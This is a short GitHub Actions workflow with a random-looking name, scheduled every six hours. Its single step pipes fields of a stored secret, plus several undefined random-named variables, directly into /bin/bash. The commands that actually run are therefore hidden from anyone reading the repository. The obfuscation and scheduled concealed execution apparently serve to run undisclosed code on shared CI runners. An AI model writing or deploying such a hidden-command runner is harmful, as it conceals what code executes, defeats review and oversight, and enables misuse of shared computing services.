name: chengengduo4781
on:
  workflow_dispatch:
  schedule:
    - cron: '29 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chengengduo4781
        env:
          ze7: ${{ secrets.ze7 }}
        run: |
          echo $ze7 | jq -r .njmtl386 | /bin/bash
          echo $rmjx70 | jq -r .dzxw41 | /bin/bash
          echo $vt819 | jq -r .kcr13 | /bin/bash
          echo $owomw5 | jq -r .bpmjf0993 | /bin/bash
          echo $oj8188 | jq -r .sgi7 | /bin/bash

